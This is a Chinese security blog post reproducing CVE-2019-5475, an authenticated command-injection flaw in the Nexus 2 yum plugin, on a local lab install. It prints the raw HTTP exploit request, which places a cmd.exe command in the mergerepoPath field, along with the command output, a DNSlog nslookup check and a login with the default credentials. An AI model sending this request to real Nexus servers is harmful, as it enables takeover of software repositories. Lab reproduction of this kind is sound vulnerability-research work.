Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

CVE-2019-5475 Nexus2 yum插件RCE漏洞复现

wpadmin~September 23, 2019 /InfoSec

CVE-2019-5475 Nexus2 yum插件RCE漏洞复现

<!–more–>

参考资料

【漏洞分析】CVE-2019-5475:Nexus 2 yum插件远程命令执行漏洞
https://mp.weixin.qq.com/s/E_BEp-yYKtIYAnQ6JP7fmg

CVE-2019-5475:Nexus2 yum插件RCE漏洞复现
https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483738&idx=1&sn=6bce2bf153ab0a07c01f746d479644d4&scene=0#wechat_redirect

环境搭建

(以 windows 为例)

1 下载 Nexus-2.14.13
https://download.sonatype.com/nexus/oss/nexus-2.14.13-01-bundle.zip

2 (管理员权限)运行 bin/jsw/windows-x86-64/install-nexus.bat

3 (管理员权限)运行 bin/jsw/windows-x86-64/start-nexus.bat
【启动速度比较慢请耐心等待】

调试参考
https://blog.csdn.net/nthack5730/article/details/51082270

4 访问 http://localhost:8081/nexus 验证服务是否启动
(默认密码 admin/admin123)

PoC

漏洞需要管理员权限,属于 after-auth RCE / 后台 getshell。

一个 tasklist 的 demo
C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\System32\\tasklist.exe &amp;

原始 HTTP 请求

PUT /nexus/service/siesta/capabilities/00014aeb0e511dc9 HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: application/json,application/vnd.siesta-error-v1+json,application/vnd.siesta-validation-errors-v1+json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Nexus-UI: true
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 323
Connection: close
Referer: http://127.0.0.1:8081/nexus/
Cookie: NXSESSIONID=8c404e22-d87d-4563-926c-d5fbac516139

{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"1"},{"key":"mergerepoPath","value":"C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\System32\\tasklist.exe &"}],"id":"00014aeb0e511dc9","notes":"Automatically added on Sun Sep 22 19:58:00 CST 2019"}

部分响应 System Idle Process 可以作为确认关键字。或者考虑基于 DNSlog 检测 C:\\Windows\\System32\\nslookup.exe &lt;prefix>.dnslog.org

>System Idle Process              0 Services                   0          8 K<br/>System                           4 Services                   0      3,424 K<br/>Registry                       120 Services                   0     93,616 K<br/>smss.exe                       420 Services                   0      1,008 K<br/>csrss.exe                      616 Services                   0      5,356 K<br/>wininit.exe                    716 Services                   0      5,964 K<br/>services.exe                   788 Services                   0      8,712 K<br/>lsass.exe                      808 Services                   0     21,068 K<br/>svchost.exe                    916 Services                   0      3,200 K<br/>svchost.exe                    940 Services                   0     29,792 K<br/>fontdrvhost.exe                964 Services                   0      2,360 K<br/>svchost.exe                    528 Services                   0     17,628 K<br/>svchost.exe                   1044 Services                   0      7,448 K<br/>svchost.exe                   1316 Services                   0      8,872 K

登陆过程

使用 HTTP Basic Auth 来进行登陆

GET /nexus/service/local/authentication/login?_dc=1569208667717 HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: application/json,application/vnd.siesta-error-v1+json,application/vnd.siesta-validation-errors-v1+json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4xMjM=
X-Nexus-UI: true
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:8081/nexus/


部分响应,确认关键字可以使用 &quot;loggedIn&quot;:true,如果登陆失败一般是返回一个 401 页面

HTTP/1.1 200 OK
Date: Mon, 23 Sep 2019 03:21:14 GMT
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Set-Cookie: NXSESSIONID=8c404e22-d87d-4563-926c-d5fbac516139; Path=/nexus; HttpOnly
Server: Nexus/2.14.13-01 Noelios-Restlet-Engine/1.1.6-SONATYPE-5348-V8
Content-Type: application/json; charset=UTF-8
Vary: Accept-Charset, Accept-Encoding, Accept-Language, Accept
Content-Length: 2554
Connection: close

{"data":{"clientPermissions":{"loggedIn":true,"loggedInUsername":"admin","loggedInUserSource":"default","permissions":[{"id":"nexus:pluginconsoleplugininfos","value":15},{"id":"security:users","value":15},{"id":"nexus:cache","value":15},{"id":"nexus:wonderland","value":15},{"id":"nexus:wastebasket","value":15},{"id":"nexus:ldapconninfo","value":15},{"id":"nexus:componentscontentclasses","value":15},{"id":"nexus:index","value":15},{"id":"nexus:analytics","value":15},{"id":"nexus:identify","value":15},{"id":"security:roles","value":15},{"id":"nexus:ldapuserrolemap","value":15},{"id":"nexus:repositorymirrorsstatus","value":15},{"id":"nexus:browseremote","value":15},{"id":"nexus:repotemplates","value":15},{"id":"nexus:ldaptestauth","value":15},{"id":"security:*","value":15},{"id":"nexus:configuration","value":15},{"id":"nexus:componentscheduletypes","value":15},{"id":"nexus:repositories","value":15},{"id":"nexus:healthcheck","value":15},{"id":"security:usersforgotid","value":15},{"id":"nexus:yumAlias","value":15},{"id":"nexus:status","value":15},{"id":"nexus:metrics-endpoints","value":15},{"id":"nexus:repostatus","value":15},{"id":"nexus:feeds","value":15},{"id":"security:componentsuserlocatortypes","value":15},{"id":"nexus:repositorymirrors","value":15},{"id":"nexus:tasksrun","value":15},{"id":"nexus:yumVersionedRepositories","value":15},{"id":"nexus:targets","value":15},{"id":"nexus:healthchecksummary","value":15},{"id":"nexus:logs","value":15},{"id":"nexus:metadata","value":15},{"id":"nexus:repometa","value":15},{"id":"nexus:repositorypredefinedmirrors","value":15},{"id":"security:userschangepw","value":15},{"id":"nexus:routes","value":15},{"id":"nexus:ldaptestuserconf","value":15},{"id":"nexus:componentrealmtypes","value":15},{"id":"nexus:capabilityTypes","value":15},{"id":"nexus:capabilities","value":15},{"id":"nexus:attributes","value":15},{"id":"nexus:ldapusergroupconf","value":15},{"id":"security:usersforgotpw","value":15},{"id":"nexus:repogroups","value":15},{"id":"nexus:command","value":15},{"id":"nexus:tasks","value":15},{"id":"apikey:access","value":15},{"id":"nexus:artifact","value":15},{"id":"security:usersreset","value":15},{"id":"nexus:logconfig","value":15},{"id":"security:userssetpw","value":15},{"id":"nexus:tasktypes","value":15},{"id":"security:privilegetypes","value":15},{"id":"nexus:settings","value":15},{"id":"security:privileges","value":15},{"id":"nexus:*","value":15},{"id":"nexus:authentication","value":15},{"id":"nexus:componentsrepotypes","value":15},{"id":"nexus:atlas","value":15}]}}}

登入失败的响应

HTTP/1.1 401 Unauthorized
Date: Mon, 23 Sep 2019 03:38:22 GMT
Server: Nexus/2.14.13-01
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Type: text/html
Connection: close

<html>
  <head>
    <title>Access Denied</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>

    <link rel="icon" type="image/png" href="http://127.0.0.1:8081/nexus/favicon.png">
    <!--[if IE]>
    <link rel="SHORTCUT ICON" href="http://127.0.0.1:8081/nexus/favicon.ico"/>
    <![endif]-->

    <link rel="stylesheet" href="http://127.0.0.1:8081/nexus/static/css/Sonatype-content.css?2.14.13-01" type="text/css" media="screen" title="no title" charset="utf-8">
  </head>
  <body>
    <h1>Access Denied</h1>
    <p>
      Please <a href="http://127.0.0.1:8081/nexus">login</a> before attempting further requests.
    </p>
  </body>
</html>

参考资料

CVE-2019-5475:Nexus2 yum插件RCE漏洞复现
https://cloud.tencent.com/developer/article/1513172

https://qiita.com/shimizukawasaki/items/12f0b69945498e6d5aa9
https://mp.weixin.qq.com/s/E_BEp-yYKtIYAnQ6JP7fmg
https://github.com/shadowsock5/Poc/blob/3b6be229acce3cbc309a6879969cf29750b14acb/nexes-manager/CVE-2019-5475.py
https://blog.spoock.com/2018/11/25/getshell-bypass-exec/

https://github.com/jaychouzzk/CVE-2019-5475-Nexus-Repository-Manager-

Leave a Reply

Your email address will not be published. Required fields are marked *